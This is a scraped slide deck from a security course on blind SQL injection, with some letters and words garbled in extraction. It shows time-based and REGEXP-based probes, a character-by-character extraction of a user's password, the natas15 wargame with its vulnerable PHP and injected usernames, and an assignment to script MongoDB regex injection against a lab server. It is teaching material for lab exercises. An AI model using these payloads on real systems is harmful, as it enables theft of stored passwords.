A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL - - PowerPoint PPT Presentation

a1 part 3 injection blind sql injection blind sql
SMART_READER_LITE
LIVE PREVIEW

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL - - PowerPoint PPT Presentation

Jan 09, 2023 452 likes •603 views

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks databases into reveal l information by way of the success or failure of injected querie ies Analogous example le: Login prompt that stops ps

slide-1
SLIDE 1

A1 (Part 3): Injection Blind SQL Injection

slide-2
SLIDE 2

Blind SQL Injection

SQL injectio ion that tricks ks databases into reveal l information by way of the success or failure of injected querie ies Analogous example le: Login prompt that stops ps if username is not valid

Must have ve login/password prompts that check ck for valid pair

Method

Employ y a game of 20 questions Use “SLEEP” with conditionals such as IF to reveal success or failure of query Utilize ze support for regular expressions in databases in queries

MySQL “LIKE” and “REGEXP” NoSQL this.match(/^[ ^[0-9]$/ $/)

slide-3
SLIDE 3

SQL - IF, LIKE, SLEEP

IF in SQL can be used to find out if something is true IF (CONDITION, TRU RUE_OUTCO COME, FALSE_OUTCOME ME) LIKE in SQL can be used to compare results using wildca cards % matche ches 0 or more charact cters _ matche ches exact ctly y one charact cter SLEEP in SQL halts the program/serve ver for X seco conds IF IF (password LIKE BINARY “p4ssw0rd”, sleep(5), null) if the password is (ca case sensitive ve) p4ssw0rd, sleep for 5 seconds. . Othe herwise, do nothi hing.

slide-4
SLIDE 4

SQL – REGEXP

REGEXP XP in SQL can be used to match a regular expression Similar to LIKE AND password REGEXP “^[a-z]” True if password begins with a lowercase character Use in conju junction with SLEEP to probe correctness of password guesses SQL code to add delay if password begins with foo

 AND password COLLATE latin1_general_cs REGEXP ”^foo” and (SLEEP(5)) AND “1”=“1”

slide-5
SLIDE 5

SQL – COUNT predicat ate

‘COUNT(*)’ returns the number of rows

  • IF((S

(SELECT CT COUNT(* (*) FROM information_schema.c .columns WHERE RE table_name = 'users') ) LIKE X, sleep(5 (5), null)

  • If

If the # of rows from the table information_schema.c .columns from the table users is X, sleep for 5 seconds. Otherwise do nothing.

slide-6
SLIDE 6

5 seconds before a response

SQL Blind Injection n example e [Time e Based]

SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “%%”, sleep(5), null) # ‘; 0.2 seconds before a response Bob’s password: % SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “a%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “b%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “c%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “d%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p%”, sleep(5), null) # ‘; Bob’s password: p% SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “pa%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “pb%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “pc%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p4%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p4ssw0rd%”, sleep(5), null) # ‘; Bob’s password: p4% Bob’s password: p4ssw0rd% 5 seconds before a response 0.2 seconds before a response 5 seconds before a response SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p4ssw0rda%”, sleep(5), null) # ‘; 0.2 seconds before a response SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p4ssw0rdb%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p4ssw0rdc%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p4ssw0rd0%”, sleep(5), null) # ‘; SELECT password, is_admin FROM users WHERE username = ‘bob’ AND IF(password LIKE BINARY “p4ssw0rd”, sleep(5), null) # ‘; 5 seconds before a response Bob’s password: p4ssw0rd

slide-7
SLIDE 7

Example: natas15.natas.labs.overthewire.org

Interface for checking if a user exists If injectable, can use Blind SQL injection to obtain password Try: foo natas16 natas16’ natas16” natas16“ OR "1"="1 natas16”#

slide-8
SLIDE 8

natas15.natas.labs.overthewire.org

Find password for user natas16

/* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */ if(array_key_exists("username", $_REQUEST)) { $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; $res = mysql_query($query, $link); if($res) { if(mysql_num_rows($res) > 0) { echo "This user exists.<br>"; } else { echo "This user doesn't exist.<br>"; } } else { echo "Error in query.<br>"; } }

slide-9
SLIDE 9

Example: natas15 (simplified)

Injected username: natas16" AND password REGEXP "^[0123456789ABCDEFGHIJKLMNOPQRSTU] Received: User does not exist Injected username: natas16" AND password REGEXP "^[VWXYZabcdefghij] Received: This user exists Injected username: natas16" AND password REGEXP "^[VWXYZab] Received: This user exists Injected username: natas16" AND password REGEXP "^[VWX] Received: This user exists Injected username: natas16" AND password REGEXP "^[V] Received: User does not exist Injected username: natas16" AND password REGEXP "^[W] Received: This user exists W Search list: [0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]

slide-10
SLIDE 10

Example: natas15

W Injected username: natas16" AND password REGEXP "^W[0123456789ABCDEFGHIJKLMNOPQRSTU] Received: User does not exist Injected username: natas16" AND password REGEXP "^W[YZ] Received: User does not exist Injected username: natas16" AND password REGEXP "^W[VWXYZabcdefghij] Received: This user exists Injected username: natas16" AND password REGEXP "^W[VWXYZab] Received: This user exists Injected username: natas16" AND password REGEXP "^W[VWX] Received: User does not exist Injected username: natas16" AND password REGEXP "^W[a] Received: This user exists Wa Injected username: natas16" AND password REGEXP "^Wa[0123456789ABCDEFGHIJKLMNOPQRSTU] Received: This user exists Search list: [0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]

slide-11
SLIDE 11

Program #1

Write a program that leverages SQL injection in MongoDB to find the password for account admin Done via injection into HTTP GET parameter Use binary search on alpha-numeric characters Use python requests (Beautiful Soup for parsing)

slide-12
SLIDE 12

Program #1

Regexp to match all passwords this.password.match(/^.*/) Add MongoDB comment and inje ject

?search=admin' && this.password.match(/^.*/)//

Then put into URL and URL-encode

http://131.252.220.62/mongodb/example2/?search=admin%27%20%26%26%20t his.password.match(%2F%5e.*%2F)%2F%2F

Only match if first char of password is capital letter or digit

http://131.252.220.62/mongodb/example2/?search=admin%27%20%26%26%20t his.password.match(%2F%5e%5bA-Z0-9%5d.*%2F)%2F%2F

Only match if first char of password is lowercase letter

http://131.252.220.62/mongodb/example2/?search=admin%27%20%26%26%20t his.password.match(%2F%5e%5ba-z%5d.*%2F)%2F%2F

slide-13
SLIDE 13

Program #1: Sample output

% python3 MongoDB2.py http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^% 5B0123456789ABCDEFGHIJKLMNOPQRSTU%5D.*/)//+%00 no match. http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^% 5BVWXYZabcdefghij%5D.*/)//+%00 matched! http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^% 5BVWXYZab%5D.*/)//+%00 no match. http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^% 5Bcdef%5D.*/)//+%00 no match. http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^% 5Bgh%5D.*/)//+%00 no match. http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^% 5Bi%5D.*/)//+%00 matched! current pass: i http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^i% 5B0123456789ABCDEFGHIJKLMNOPQRSTU%5D.*/)//+%00 no match. http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^i% 5BVWXYZabcdefghij%5D.*/)//+%00 matched!

slide-14
SLIDE 14

Questions

  • https://sayat.me/wu4f